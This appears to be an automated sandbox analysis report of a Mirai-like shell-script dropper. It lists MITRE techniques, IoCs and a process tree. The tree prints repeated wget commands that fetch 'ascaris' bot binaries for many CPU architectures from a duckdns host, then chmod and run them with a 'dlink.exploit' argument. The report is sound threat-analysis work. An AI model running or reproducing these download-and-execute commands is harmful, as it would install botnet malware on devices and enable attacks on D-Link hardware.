8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc

Analysis

max time kernel
1086s
max time network
152s
platform
debian-9_mipsel
resource
debian9-mipsel-20221111-en
resource tags

arch:mipselimage:debian9-mipsel-20221111-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
24-11-2022 07:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh
Size

3KB
MD5

7dbbc27e3aad4bf3d8a3990f009e208b
SHA1

0e9246139e1056e165231b637ecbc91eab940c31
SHA256

8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc
SHA512

d6d843465ecf48a8423bbe8d8688e7a3050c0f4fbd418433097e4c5bdc85d08b41bbecdf1bb85a2a2933e9180f1fb1276006b6ef2c2861e02b07d66972a5af5b

Score

9^/10

discovery

Malware Config

Signatures

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Scanning
T1046
Modifies the Watchdog daemon 1 TTPs
Malware like Mirai modify the Watchdog to prevent it restarting an infected system.

Impair Defenses
T1562

Modifies hosts file 15 IoCs

Adds to hosts file used for mapping hosts to IP addresses.

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget
/etc/hosts	/etc/hosts	wget

Writes DNS configuration 1 TTPs 15 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	process
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget
/etc/resolv.conf	/etc/resolv.conf	wget

Enumerates active TCP sockets 1 TTPs 12 IoCs

Gets active TCP sockets from /proc virtual filesystem.

System Network Connections Discovery

T1049

Processes:

toxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocara

description	ioc	process
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara

Reads system network configuration 1 TTPs 12 IoCs

Uses contents of /proc filesystem to enumerate network settings.

System Network Configuration Discovery

T1016

Processes:

toxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocaratoxocara

description	ioc	process
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara
/proc/net/tcp	/proc/net/tcp	toxocara

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

description	ioc
/proc/372/cmdline	/proc/372/cmdline
/proc/152/cmdline	/proc/152/cmdline
/proc/245/cmdline	/proc/245/cmdline
/proc/255/cmdline	/proc/255/cmdline
/proc/409/cmdline	/proc/409/cmdline
/proc/320/cmdline	/proc/320/cmdline
/proc/146/cmdline	/proc/146/cmdline
/proc/354/cmdline	/proc/354/cmdline
/proc/408/cmdline	/proc/408/cmdline
/proc/5/cmdline	/proc/5/cmdline
/proc/435/cmdline	/proc/435/cmdline
/proc/437/cmdline	/proc/437/cmdline
/proc/446/cmdline	/proc/446/cmdline
/proc/12/cmdline	/proc/12/cmdline
/proc/71/cmdline	/proc/71/cmdline
/proc/72/cmdline	/proc/72/cmdline
/proc/299/cmdline	/proc/299/cmdline
/proc/454/cmdline	/proc/454/cmdline
/proc/455/cmdline	/proc/455/cmdline
/proc/	/proc/
/proc/324/cmdline	/proc/324/cmdline
/proc/355/cmdline	/proc/355/cmdline
/proc/3/cmdline	/proc/3/cmdline
/proc/19/cmdline	/proc/19/cmdline
/proc/69/cmdline	/proc/69/cmdline
/proc/322/cmdline	/proc/322/cmdline
/proc/75/cmdline	/proc/75/cmdline
/proc/289/cmdline	/proc/289/cmdline
/proc/417/cmdline	/proc/417/cmdline
/proc/427/cmdline	/proc/427/cmdline
/proc/445/cmdline	/proc/445/cmdline
/proc/1/cmdline	/proc/1/cmdline
/proc/428/cmdline	/proc/428/cmdline
/proc/444/cmdline	/proc/444/cmdline
/proc/9/cmdline	/proc/9/cmdline
/proc/280/cmdline	/proc/280/cmdline
/proc/15/cmdline	/proc/15/cmdline
/proc/18/cmdline	/proc/18/cmdline
/proc/363/cmdline	/proc/363/cmdline
/proc/390/cmdline	/proc/390/cmdline
/proc/22/cmdline	/proc/22/cmdline
/proc/401/cmdline	/proc/401/cmdline
/proc/381/cmdline	/proc/381/cmdline
/proc/419/cmdline	/proc/419/cmdline
/proc/114/cmdline	/proc/114/cmdline
/proc/236/cmdline	/proc/236/cmdline
/proc/410/cmdline	/proc/410/cmdline
/proc/7/cmdline	/proc/7/cmdline
/proc/36/cmdline	/proc/36/cmdline
/proc/77/cmdline	/proc/77/cmdline
/proc/157/cmdline	/proc/157/cmdline
/proc/215/cmdline	/proc/215/cmdline
/proc/345/cmdline	/proc/345/cmdline
/proc/383/cmdline	/proc/383/cmdline
/proc/510/cmdline	/proc/510/cmdline
/proc/4/cmdline	/proc/4/cmdline
/proc/522/cmdline	/proc/522/cmdline
/proc/8/cmdline	/proc/8/cmdline
/proc/73/cmdline	/proc/73/cmdline
/proc/373/cmdline	/proc/373/cmdline
/proc/24/cmdline	/proc/24/cmdline
/proc/81/cmdline	/proc/81/cmdline
/proc/104/cmdline	/proc/104/cmdline
/proc/140/cmdline	/proc/140/cmdline

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

Processes:

8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh

description	ioc	process
/tmp/8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh	/tmp/8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh	8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh

/tmp/8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh
/tmp/8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh
1⤵
- Writes file to tmp directory
PID:322
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.x86
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:323
- /bin/cat
  cat ascaris.x86
  2⤵
  PID:328
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:329
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  PID:330
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.mips
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:332
- /bin/cat
  cat ascaris.mips
  2⤵
  PID:334
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.mips ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:335
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  PID:336
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.mpsl
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:338
- /bin/cat
  cat ascaris.mpsl
  2⤵
  PID:340
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.mips ascaris.mpsl ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:341
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  PID:342
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.arm
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:345
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arm ascaris.mips ascaris.mpsl ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:350
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:351
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.arm5
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:356
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arm ascaris.arm5 ascaris.mips ascaris.mpsl ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:359
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:360
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.arm6
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:363
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.mips ascaris.mpsl ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:368
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:369
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.arm7
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:373
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.mips ascaris.mpsl ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:377
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:378
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.ppc
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:383
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.mips ascaris.mpsl ascaris.ppc ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:386
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:387
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.m68k
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:391
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.m68k ascaris.mips ascaris.mpsl ascaris.ppc ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:395
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:396
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.sh4
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:401
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.m68k ascaris.mips ascaris.mpsl ascaris.ppc ascaris.sh4 ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:404
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:405
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.spc
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:410
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.m68k ascaris.mips ascaris.mpsl ascaris.ppc ascaris.sh4 ascaris.spc ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:413
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:414
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.arc
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:417
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arc ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.m68k ascaris.mips ascaris.mpsl ascaris.ppc ascaris.sh4 ascaris.spc ascaris.x86 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:422
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:423
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.x86_64
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:428
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arc ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.m68k ascaris.mips ascaris.mpsl ascaris.ppc ascaris.sh4 ascaris.spc ascaris.x86 ascaris.x86_64 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:431
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:432
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.i686
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:435
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arc ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.i686 ascaris.m68k ascaris.mips ascaris.mpsl ascaris.ppc ascaris.sh4 ascaris.spc ascaris.x86 ascaris.x86_64 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:440
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:441
- /usr/bin/wget
  wget http://amkbins.duckdns.org/bins/ascaris.i486
  2⤵
  - Modifies hosts file
  - Writes DNS configuration
  PID:446
- /bin/chmod
  chmod +x 8c1b779d5da39605330cd8d160ea4618ea83bd33f2732ebef54332853e0c9acc.sh ascaris.arc ascaris.arm ascaris.arm5 ascaris.arm6 ascaris.arm7 ascaris.i486 ascaris.i686 ascaris.m68k ascaris.mips ascaris.mpsl ascaris.ppc ascaris.sh4 ascaris.spc ascaris.x86 ascaris.x86_64 systemd-private-cf3cad53ab9e4b89b49b1fac3ac3b8ec-systemd-timesyncd.service-2oqTx1 toxocara
  2⤵
  PID:449
- ./toxocara
  ./toxocara dlink.exploit
  2⤵
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:450

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Network Service Scanning

T1046

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Dynamic Resolution

T1568

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads